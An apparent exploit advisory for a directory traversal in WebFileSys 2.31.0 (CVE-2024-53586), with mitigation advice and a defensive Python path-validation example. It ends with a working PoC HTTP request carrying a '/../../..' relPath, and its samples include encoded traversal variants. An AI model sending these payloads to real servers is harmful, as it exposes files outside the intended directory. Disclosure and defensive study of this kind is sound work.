Vendor: WebFileSys
By: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee
CVSS: 6.1 (HIGH)
CWE: CWE-22 (Directory Traversal)
Product Name: WebFileSys
Affected Version From: 2.31.0
Affected Version To: 2.31.0
Patch Exists: NO
Related CVE: CVE-2024-53586
CPE: webfilesys:webfilesys:2.31.0
Metasploit:
Other Scripts:
Platforms Tested: macOS
Year: 2024

WebFileSys 2.31.0 – Directory Traversal Vulnerability in relPath Parameter

WebFileSys 2.31.0 is vulnerable to directory traversal in the 'relPath' parameter of the servlet's folderFileList command (reached with command=mobile&cmd=folderFileList). The parameter is used to build a filesystem path without being confined to the intended document root, so a request carrying traversal sequences such as /../../.. in relPath makes the server list and expose directories and files outside the directory structure it is meant to serve. The published PoC sends the request inside an existing session (it carries a JSESSIONID cookie). This vulnerability has been assigned CVE-2024-53586.

Mitigation:

No vendor patch is listed for this issue. To mitigate it, the application must treat relPath as untrusted: percent-decode it, canonicalize the resulting path against the configured document root, and reject any request whose canonical path is not the root itself or a descendant of it. Merely stripping ".." substrings is not enough, since encoded or nested forms survive naive filtering. In addition, access controls should be enforced on the server side so that even an in-session user cannot reach directories they are not entitled to, and the application should run under an account with read access only to the directories it is meant to serve.
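The check described above, as an added example (this is illustrative Python, not WebFileSys's own Java code). It places the vulnerable pattern, a path that simply concatenates relPath onto the root, beside a hardened resolver that decodes, canonicalizes and then verifies the result stays under the root, and runs both against the advisory's payload plus a few constructed variants (encoded dots, double encoding, traversal hidden behind a valid prefix). The document root, function names and sample inputs are assumptions chosen for illustration.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed document root that relPath is supposed to stay inside (illustrative value).
DOC_ROOT = "/srv/webfilesys/docroot"


def resolve_naive(base, rel_path):
    """Vulnerable pattern: glue the user-supplied relPath onto the root and
    normalise. '..' segments are honoured, so the result can leave base."""
    return posixpath.normpath(base + "/" + rel_path)


def resolve_safe(base, rel_path):
    """Hardened pattern: decode, normalise, then require the canonical result
    to be base itself or a descendant of base. Raises ValueError otherwise."""
    root = posixpath.normpath(base)
    # Decode twice so that %2e%2e and %252e%252e are both caught; a legitimate
    # name containing a literal '%' may be rejected, which is the safe failure.
    decoded = unquote(unquote(rel_path)).replace("\\", "/")
    if "\x00" in decoded:
        raise ValueError("NUL byte in relPath")
    # A leading '/' must not turn the path absolute; strip it and keep it relative.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # The trailing '/' in the prefix test stops '/docroot2' from matching '/docroot'.
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("relPath escapes the document root: %r" % rel_path)
    return candidate


def is_within_root(base, rel_path):
    """Boolean form of resolve_safe for callers that only need accept/reject."""
    try:
        resolve_safe(base, rel_path)
        return True
    except ValueError:
        return False


def classify_request_line(request_line):
    """Extract relPath from an HTTP request line and say whether the hardened
    resolver would accept it. Returns (verdict, relPath)."""
    _method, target, _version = request_line.split(" ", 2)
    params = parse_qs(urlsplit(target).query)
    rel = params.get("relPath", [""])[0]
    return ("allowed" if is_within_root(DOC_ROOT, rel) else "blocked"), rel


# The request line from the advisory's PoC, followed by constructed variants.
POC_LINE = ("GET /webfilesys/servlet?command=mobile&cmd=folderFileList"
            "&initial=true&relPath=/../../.. HTTP/1.1")
SAMPLES = [
    "/../../..",                      # advisory payload
    "%2e%2e/%2e%2e/%2e%2e/etc",       # percent-encoded dots
    "%252e%252e/%252e%252e",          # double-encoded dots
    "docs/../../outside",             # traversal hidden behind a valid prefix
    "docs/readme.txt",                # legitimate
    "",                               # root listing, legitimate
]

if __name__ == "__main__":
    print("naive resolution of PoC payload:", resolve_naive(DOC_ROOT, "/../../.."))
    for rel in SAMPLES:
        verdict = "allowed" if is_within_root(DOC_ROOT, rel) else "blocked"
        print("%-30r %s" % (rel, verdict))
    print("PoC request line:", classify_request_line(POC_LINE))
```

The naive resolver turns the advisory's payload into "/" (the filesystem root), which is exactly the escape the PoC exploits; the hardened one rejects it and every encoded or prefixed variant while still accepting ordinary relative names and the empty path. The check here is purely lexical (posixpath.normpath); in a real deployment, resolve the candidate with os.path.realpath as well so that a symlink inside the root cannot point back out of it.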

Exploit-DB raw data:

# Exploit Title: WebFileSys 2.31.0 - Directory Path Traversal in relPath Parameter
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee 
# Vendor Homepage: http://www.webfilesys.de/webfilesys-home/index.html
# Software Link: http://www.webfilesys.de/webfilesys-home/download.html
# Version: 2.31.0
# Tested on: macOS
# CVE : CVE-2024-53586

GET /webfilesys/servlet?command=mobile&cmd=folderFileList&initial=true&relPath=/../../.. HTTP/1.1
Host: www.webfilesys.de
Cookie: JSESSIONID=BE9434E13C7CDE33D00D6F484F64EFB8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.webfilesys.de/webfilesys/servlet?command=menuBar
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Priority: u=0, i
Te: trailers
Connection: keep-alive